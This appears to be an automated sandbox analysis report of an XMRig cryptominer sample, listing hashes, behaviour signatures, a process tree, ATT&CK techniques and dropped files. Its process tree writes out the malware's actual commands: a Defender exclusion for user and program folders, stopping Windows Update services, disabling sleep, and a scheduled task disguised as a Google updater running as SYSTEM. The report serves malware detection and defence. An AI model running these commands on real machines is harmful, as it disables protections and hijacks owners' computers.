Analysis

  • max time kernel
    153s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-04-2023 05:51

General

  • Target

    给老子冲/影流之王🈹 (7).exe

  • Size

    10.7MB

  • MD5

    a090c26b4be46ffdf226a0b7a453f51f

  • SHA1

    6a1743d359bef4ee18fdee6a6bf5199e69f07cfb

  • SHA256

    bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef

  • SHA512

    83c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691

  • SSDEEP

    196608:/NQqSiD+bU2fbWzTRdtMQ4GraMTsGhbgOp4m:hmfqXtMQPravGh0Oym

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 11 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 1 IoCs
  • Themida packer 19 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3140
      • C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (7).exe
        "C:\Users\Admin\AppData\Local\Temp\给老子冲\影流之王🈹 (7).exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Drops file in Drivers directory
        • Checks BIOS information in registry
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2084
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2344
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:3016
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:4816
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:4724
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:3864
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:3904
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3940
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3452
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2788
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1208
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2876
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bcvarz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4036
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:3040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:2396
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3572
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3784
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:1412
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:3500
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:4640
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:1504
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:2480
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:2008
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:5076
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:1384
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#bcvarz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1988
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:100
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2784
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Drops file in Drivers directory
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Checks whether UAC is enabled
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:848

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Defense Evasion

                Virtualization/Sandbox Evasion

                1
                T1497

                Impair Defenses

                1
                T1562

                Discovery

                Query Registry

                3
                T1012

                Virtualization/Sandbox Evasion

                1
                T1497

                System Information Discovery

                2
                T1082

                Impact

                Service Stop

                1
                T1489

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\updater.exe
                  Filesize

                  10.7MB

                  MD5

                  a090c26b4be46ffdf226a0b7a453f51f

                  SHA1

                  6a1743d359bef4ee18fdee6a6bf5199e69f07cfb

                  SHA256

                  bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef

                  SHA512

                  83c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691

                • C:\Program Files\Google\Chrome\updater.exe
                  Filesize

                  10.7MB

                  MD5

                  a090c26b4be46ffdf226a0b7a453f51f

                  SHA1

                  6a1743d359bef4ee18fdee6a6bf5199e69f07cfb

                  SHA256

                  bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef

                  SHA512

                  83c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  944B

                  MD5

                  cadef9abd087803c630df65264a6c81c

                  SHA1

                  babbf3636c347c8727c35f3eef2ee643dbcc4bd2

                  SHA256

                  cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

                  SHA512

                  7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kz1uo0gr.01k.ps1
                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\System32\drivers\etc\hosts
                  Filesize

                  3KB

                  MD5

                  00930b40cba79465b7a38ed0449d1449

                  SHA1

                  4b25a89ee28b20ba162f23772ddaf017669092a5

                  SHA256

                  eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                  SHA512

                  cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                  Filesize

                  4KB

                  MD5

                  bdb25c22d14ec917e30faf353826c5de

                  SHA1

                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                  SHA256

                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                  SHA512

                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Filesize

                  1KB

                  MD5

                  b42c70c1dbf0d1d477ec86902db9e986

                  SHA1

                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                  SHA256

                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                  SHA512

                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                • memory/100-252-0x00007FF7F4310000-0x00007FF7F433A000-memory.dmp
                  Filesize

                  168KB

                • memory/100-257-0x00007FF7F4310000-0x00007FF7F433A000-memory.dmp
                  Filesize

                  168KB

                • memory/848-175-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-181-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-248-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-178-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-180-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-177-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-176-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-191-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/848-179-0x00007FF7BF810000-0x00007FF7C060A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/1988-241-0x00007FF4AEF90000-0x00007FF4AEFA0000-memory.dmp
                  Filesize

                  64KB

                • memory/1988-238-0x0000021608310000-0x0000021608320000-memory.dmp
                  Filesize

                  64KB

                • memory/1988-239-0x0000021608310000-0x0000021608320000-memory.dmp
                  Filesize

                  64KB

                • memory/1988-240-0x0000021608310000-0x0000021608320000-memory.dmp
                  Filesize

                  64KB

                • memory/1988-242-0x0000021608310000-0x0000021608320000-memory.dmp
                  Filesize

                  64KB

                • memory/2084-151-0x000001EF06590000-0x000001EF065A0000-memory.dmp
                  Filesize

                  64KB

                • memory/2084-152-0x000001EF06590000-0x000001EF065A0000-memory.dmp
                  Filesize

                  64KB

                • memory/2084-150-0x000001EF06590000-0x000001EF065A0000-memory.dmp
                  Filesize

                  64KB

                • memory/2084-140-0x000001EF06380000-0x000001EF063A2000-memory.dmp
                  Filesize

                  136KB

                • memory/2396-193-0x000001DD01940000-0x000001DD01950000-memory.dmp
                  Filesize

                  64KB

                • memory/2396-192-0x000001DD01940000-0x000001DD01950000-memory.dmp
                  Filesize

                  64KB

                • memory/2396-194-0x000001DD01940000-0x000001DD01950000-memory.dmp
                  Filesize

                  64KB

                • memory/2396-204-0x000001DD02870000-0x000001DD0288C000-memory.dmp
                  Filesize

                  112KB

                • memory/2396-205-0x00007FF42CA60000-0x00007FF42CA70000-memory.dmp
                  Filesize

                  64KB

                • memory/2396-206-0x000001DD67B20000-0x000001DD67B2A000-memory.dmp
                  Filesize

                  40KB

                • memory/2396-207-0x000001DD67B90000-0x000001DD67BAC000-memory.dmp
                  Filesize

                  112KB

                • memory/2396-208-0x000001DD67B30000-0x000001DD67B3A000-memory.dmp
                  Filesize

                  40KB

                • memory/2396-209-0x000001DD67BB0000-0x000001DD67BCA000-memory.dmp
                  Filesize

                  104KB

                • memory/2396-210-0x000001DD02A90000-0x000001DD02A98000-memory.dmp
                  Filesize

                  32KB

                • memory/2396-211-0x000001DD02AA0000-0x000001DD02AA6000-memory.dmp
                  Filesize

                  24KB

                • memory/2396-212-0x000001DD67B70000-0x000001DD67B7A000-memory.dmp
                  Filesize

                  40KB

                • memory/2396-215-0x000001DD01940000-0x000001DD01950000-memory.dmp
                  Filesize

                  64KB

                • memory/2396-251-0x000001DD01940000-0x000001DD01950000-memory.dmp
                  Filesize

                  64KB

                • memory/2784-249-0x0000000001760000-0x0000000001780000-memory.dmp
                  Filesize

                  128KB

                • memory/2784-261-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-273-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-271-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-269-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-267-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-265-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-263-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-259-0x0000000011F40000-0x0000000011F60000-memory.dmp
                  Filesize

                  128KB

                • memory/2784-258-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-250-0x0000000011E00000-0x0000000011E40000-memory.dmp
                  Filesize

                  256KB

                • memory/2784-256-0x0000000011F40000-0x0000000011F60000-memory.dmp
                  Filesize

                  128KB

                • memory/2784-255-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/2784-253-0x00007FF6DDE40000-0x00007FF6DE62F000-memory.dmp
                  Filesize

                  7.9MB

                • memory/4036-167-0x0000020B39E40000-0x0000020B39E50000-memory.dmp
                  Filesize

                  64KB

                • memory/4036-168-0x0000020B39E40000-0x0000020B39E50000-memory.dmp
                  Filesize

                  64KB

                • memory/4036-169-0x0000020B39E40000-0x0000020B39E50000-memory.dmp
                  Filesize

                  64KB

                • memory/4036-171-0x0000020B552D0000-0x0000020B554EC000-memory.dmp
                  Filesize

                  2.1MB

                • memory/4112-135-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-136-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-134-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-137-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-133-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-173-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-138-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB

                • memory/4112-139-0x00007FF6B6AA0000-0x00007FF6B789A000-memory.dmp
                  Filesize

                  14.0MB